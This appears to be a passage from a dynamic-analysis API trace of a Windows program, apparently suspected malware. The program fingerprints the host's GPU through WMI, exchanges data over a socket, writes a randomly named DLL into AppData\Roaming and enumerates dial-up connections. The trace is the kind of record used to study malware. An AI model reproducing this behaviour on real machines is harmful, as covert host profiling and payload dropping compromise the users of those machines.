	[0222.732] CoGetObjectContext (in: riid=0x1c80cfa8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cfa0 | out: ppv=0x1c80cfa0*=0x181868) returned 0x0
	[0222.733] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80cfc0 | out: pAptType=0x1c80cfc0*=1) returned 0x0
	[0222.733] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d0c8 | out: ppvObject=0x1c80d0c8*=0x0) returned 0x80004002
	[0222.733] IUnknown:Release (This=0x181868) returned 0x1
	[0222.733] CoGetClassObject (in: rclsid=0x1b802378*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80c630 | out: ppv=0x1c80c630*=0x1c83e320) returned 0x0
	[0222.733] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c83e320, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c340 | out: ppvObject=0x1c80c340*=0x0) returned 0x80004002
	[0222.733] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c83e320, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c328 | out: ppvObject=0x1c80c328*=0x1c8381b0) returned 0x0
	[0222.734] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8381b0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c230 | out: ppvObject=0x1c80c230*=0x1c8381b0) returned 0x0
	[0222.734] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8381b0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c2b0 | out: ppvObject=0x1c80c2b0*=0x0) returned 0x80004002
	[0222.734] WbemDefPath:IUnknown:AddRef (This=0x1c8381b0) returned 0x3
	[0222.734] CoGetContextToken (in: pToken=0x1c80bf00 | out: pToken=0x1c80bf00) returned 0x0
	[0222.734] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8381b0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bec0 | out: ppvObject=0x1c80bec0*=0x1b82c780) returned 0x0
	[0222.734] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b82c780, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80bef0 | out: pCid=0x1c80bef0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0222.735] WbemDefPath:IUnknown:Release (This=0x1b82c780) returned 0x3
	[0222.735] CoGetContextToken (in: pToken=0x1c80bed0 | out: pToken=0x1c80bed0) returned 0x0
	[0222.735] WbemDefPath:IUnknown:AddRef (This=0x1c8381b0) returned 0x4
	[0222.735] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8381b0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bfe8 | out: ppvObject=0x1c80bfe8*=0x0) returned 0x80004002
	[0222.735] WbemDefPath:IUnknown:Release (This=0x1c8381b0) returned 0x3
	[0222.735] WbemDefPath:IUnknown:Release (This=0x1c8381b0) returned 0x2
	[0222.735] WbemDefPath:IUnknown:Release (This=0x1c83e320) returned 0x0
	[0222.735] WbemDefPath:IUnknown:Release (This=0x1c8381b0) returned 0x1
	[0222.735] CoGetContextToken (in: pToken=0x1c80cc00 | out: pToken=0x1c80cc00) returned 0x0
	[0222.735] CoGetContextToken (in: pToken=0x1c80cb40 | out: pToken=0x1c80cb40) returned 0x0
	[0222.735] WbemDefPath:IUnknown:AddRef (This=0x1c8381b0) returned 0x2
	[0222.735] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8381b0, riid=0x1c80cc80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80cc60 | out: ppvObject=0x1c80cc60*=0x1c8381b0) returned 0x0
	[0222.736] WbemDefPath:IUnknown:Release (This=0x1c8381b0) returned 0x2
	[0222.736] WbemDefPath:IUnknown:Release (This=0x1c8381b0) returned 0x1
	[0222.736] CoGetContextToken (in: pToken=0x1c80cd80 | out: pToken=0x1c80cd80) returned 0x0
	[0222.736] CoGetContextToken (in: pToken=0x1c80ccc0 | out: pToken=0x1c80ccc0) returned 0x0
	[0222.736] WbemDefPath:IUnknown:AddRef (This=0x1c8381b0) returned 0x2
	[0222.736] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8381b0, riid=0x1c80ce00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80cde0 | out: ppvObject=0x1c80cde0*=0x1c8381b0) returned 0x0
	[0222.736] WbemDefPath:IUnknown:Release (This=0x1c8381b0) returned 0x2
	[0222.736] WbemDefPath:IUnknown:AddRef (This=0x1c8381b0) returned 0x3
	[0222.736] WbemDefPath:IWbemPath:SetText (This=0x1c8381b0, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x0
	[0222.736] WbemDefPath:IUnknown:Release (This=0x1c8381b0) returned 0x2
	[0222.736] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8380f0, puCount=0x1c80d040 | out: puCount=0x1c80d040*=0x2) returned 0x0
	[0222.736] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80d040*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d040*=0x17, pszText=0x0) returned 0x0
	[0222.736] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80d040*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d040*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.736] CoTaskMemAlloc (cb=0x8) returned 0x1b830100
	[0222.737] IEnumWbemClassObject:Next (in: This=0x1c844e18, lTimeout=-1, uCount=0x1, apObjects=0x1b830100, puReturned=0x1c80d0f8 | out: apObjects=0x1b830100*=0x0, puReturned=0x1c80d0f8*=0x0) returned 0x1
	[0222.746] CoTaskMemFree (pv=0x1b830100) 
	[0222.746] CoGetContextToken (in: pToken=0x1c80ce80 | out: pToken=0x1c80ce80) returned 0x0
	[0222.746] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x1
	[0222.746] IUnknown:Release (This=0x1c844e18) returned 0x0
	[0222.750] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8380f0, puCount=0x1c80d1a0 | out: puCount=0x1c80d1a0*=0x2) returned 0x0
	[0222.751] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80d1a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1a0*=0x17, pszText=0x0) returned 0x0
	[0222.751] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80d1a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.751] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d18c*=0, plFlavor=0x1c80d188*=0 | out: pVal=0x1c80d190*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c80d18c*=8, plFlavor=0x1c80d188*=64) returned 0x0
	[0222.751] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0222.751] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64 | out: pVal=0x1c80d1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64) returned 0x0
	[0222.751] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0222.751] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8380f0, puCount=0x1c80d1a0 | out: puCount=0x1c80d1a0*=0x2) returned 0x0
	[0222.751] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80d1a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1a0*=0x17, pszText=0x0) returned 0x0
	[0222.751] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80d1a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.751] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="__CLASS", lFlags=0, pVal=0x1c80d190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d18c*=0, plFlavor=0x1c80d188*=0 | out: pVal=0x1c80d190*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_VideoController", varVal2=0x0), pType=0x1c80d18c*=8, plFlavor=0x1c80d188*=64) returned 0x0
	[0222.751] SysStringLen (param_1="Win32_VideoController") returned 0x15
	[0222.751] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="__CLASS", lFlags=0, pVal=0x1c80d1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64 | out: pVal=0x1c80d1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_VideoController", varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64) returned 0x0
	[0222.751] SysStringLen (param_1="Win32_VideoController") returned 0x15
	[0222.752] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8380f0, puCount=0x1c80d130 | out: puCount=0x1c80d130*=0x2) returned 0x0
	[0222.752] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80d130*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d130*=0x17, pszText=0x0) returned 0x0
	[0222.752] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80d130*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d130*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.752] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8380f0, puCount=0x1c80d130 | out: puCount=0x1c80d130*=0x2) returned 0x0
	[0222.752] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80d130*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d130*=0x17, pszText=0x0) returned 0x0
	[0222.752] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80d130*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d130*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.752] IWbemClassObject:GetNames (in: This=0x1c83eb80, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c80d128*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c80d120 | out: pNames=0x1c80d120*="\x01ƀ\x08") returned 0x0
	[0222.752] SafeArrayGetDim (psa=0x1b813ad0) returned 0x1
	[0222.752] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="__GENUS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c80d11c*=3, plFlavor=0x1c80d118*=64) returned 0x0
	[0222.753] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="__CLASS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_VideoController", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0222.753] SysStringLen (param_1="Win32_VideoController") returned 0x15
	[0222.753] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0222.753] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="__DYNASTY", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_VideoController", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0222.753] SysStringLen (param_1="Win32_VideoController") returned 0x15
	[0222.753] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="__RELPATH", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_VideoController.DeviceID=\"VideoController1\"", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0222.753] SysStringLen (param_1="Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x31
	[0222.753] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3b, varVal2=0x0), pType=0x1c80d11c*=3, plFlavor=0x1c80d118*=64) returned 0x0
	[0222.753] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="__DERIVATION", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b813ad0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b8300f0, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x1c80d11c*=8200, plFlavor=0x1c80d118*=64) returned 0x0
	[0222.754] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="__SERVER", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0222.754] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0222.754] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0222.754] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0222.754] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="__PATH", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0222.754] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x48
	[0222.754] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8380f0, puCount=0x1c80d1c0 | out: puCount=0x1c80d1c0*=0x2) returned 0x0
	[0222.754] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80d1c0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1c0*=0x17, pszText=0x0) returned 0x0
	[0222.754] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80d1c0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1c0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.754] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="Description", lFlags=0, pVal=0x1c80d1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d1ac*=0, plFlavor=0x1c80d1a8*=0 | out: pVal=0x1c80d1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NVIDIA GeForce 840M", varVal2=0x0), pType=0x1c80d1ac*=8, plFlavor=0x1c80d1a8*=32) returned 0x0
	[0222.754] SysStringLen (param_1="NVIDIA GeForce 840M") returned 0x13
	[0222.755] IWbemClassObject:Get (in: This=0x1c83eb80, wszName="Description", lFlags=0, pVal=0x1c80d3e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d3dc*=8, plFlavor=0x1c80d3d8*=32 | out: pVal=0x1c80d3e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NVIDIA GeForce 840M", varVal2=0x0), pType=0x1c80d3dc*=8, plFlavor=0x1c80d3d8*=32) returned 0x0
	[0222.755] SysStringLen (param_1="NVIDIA GeForce 840M") returned 0x13
	[0222.757] send (s=0x404, buf=0x31c6100*, len=176, flags=0) returned 176
	[0222.757] recv (in: s=0x404, buf=0x30764f8, len=502, flags=0 | out: buf=0x30764f8*) returned 24
	[0222.763] VirtualQuery (in: lpAddress=0x1c80cce0, lpBuffer=0x1c80dba0, dwLength=0x30 | out: lpBuffer=0x1c80dba0*(BaseAddress=0x1c80c000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0222.764] send (s=0x404, buf=0x31d3e18*, len=20, flags=0) returned 20
	[0222.765] recv (in: s=0x404, buf=0x30764f8, len=502, flags=0 | out: buf=0x30764f8*) returned 202
	[0226.791] VirtualQuery (in: lpAddress=0x1c80cce0, lpBuffer=0x1c80dba0, dwLength=0x30 | out: lpBuffer=0x1c80dba0*(BaseAddress=0x1c80c000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0228.303] CoTaskMemAlloc (cb=0x104) returned 0x1b824b80
	[0228.303] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x1b824b80, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d
	[0228.303] CoTaskMemFree (pv=0x1b824b80) 
	[0228.304] CoTaskMemAlloc (cb=0x104) returned 0x1b824b80
	[0228.304] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x1b824b80, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d
	[0228.304] CoTaskMemFree (pv=0x1b824b80) 
	[0229.416] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NGHvEOGrPRHHZU.dll", nBufferLength=0x105, lpBuffer=0x1c80ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NGHvEOGrPRHHZU.dll", lpFilePart=0x0) returned 0x40
	[0229.416] SetErrorMode (uMode=0x1) returned 0x1
	[0229.416] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NGHvEOGrPRHHZU.dll" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\nghveogrprhhzu.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4c8
	[0229.417] GetFileType (hFile=0x4c8) returned 0x1
	[0229.417] SetErrorMode (uMode=0x1) returned 0x1
	[0229.417] GetFileType (hFile=0x4c8) returned 0x1
	[0229.419] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4f8
	[0229.419] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x52c
	[0229.435] GetCurrentProcess () returned 0xffffffffffffffff
	[0229.435] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80cab8 | out: TokenHandle=0x1c80cab8*=0x530) returned 1
	[0229.444] GetCurrentProcess () returned 0xffffffffffffffff
	[0229.444] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80cab8 | out: TokenHandle=0x1c80cab8*=0x534) returned 1
	[0229.459] GetCurrentProcess () returned 0xffffffffffffffff
	[0229.459] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80c9f8 | out: TokenHandle=0x1c80c9f8*=0x538) returned 1
	[0229.549] GetCurrentProcess () returned 0xffffffffffffffff
	[0229.549] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80c9f8 | out: TokenHandle=0x1c80c9f8*=0x53c) returned 1
	[0229.554] GetCurrentProcess () returned 0xffffffffffffffff
	[0229.554] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c80d038 | out: TokenHandle=0x1c80d038*=0x540) returned 1
	[0229.567] CoTaskMemAlloc (cb=0xcd0) returned 0x1b832830
	[0229.567] RasEnumConnectionsW (in: param_1=0x1b832830, param_2=0x1c80d08c, param_3=0x1c80d088 | out: param_1=0x1b832830, param_2=0x1c80d08c, param_3=0x1c80d088) returned 0x0
	[0229.571] CoTaskMemFree (pv=0x1b832830) 
	[0229.572] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x56c
	[0229.572] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x570
	[0229.573] ioctlsocket (in: s=0x56c, cmd=-2147195266, argp=0x1c80d0b8 | out: argp=0x1c80d0b8) returned 0
	[0229.573] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x574
	[0229.574] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x578
	[0229.574] ioctlsocket (in: s=0x574, cmd=-2147195266, argp=0x1c80d0b8 | out: argp=0x1c80d0b8) returned 0
	[0229.574] WSAIoctl (in: s=0x56c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c80d030, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c80d030, lpOverlapped=0x0) returned -1
	[0229.576] CoTaskMemAlloc (cb=0x204) returned 0x1b826e10
	[0229.576] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1b826e10, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0229.576] CoTaskMemFree (pv=0x1b826e10) 
	[0229.577] WSAEventSelect (s=0x56c, hEventObject=0x570, lNetworkEvents=512) returned 0
	[0229.577] WSAIoctl (in: s=0x574, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c80d030, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c80d030, lpOverlapped=0x0) returned -1
	[0229.577] CoTaskMemAlloc (cb=0x204) returned 0x1b826e10
	[0229.577] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1b826e10, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0229.577] CoTaskMemFree (pv=0x1b826e10) 
	[0229.577] WSAEventSelect (s=0x574, hEventObject=0x578, lNetworkEvents=512) returned 0
	[0229.577] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x57c
	[0229.578] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x57c, param_3=0x3) returned 0x0
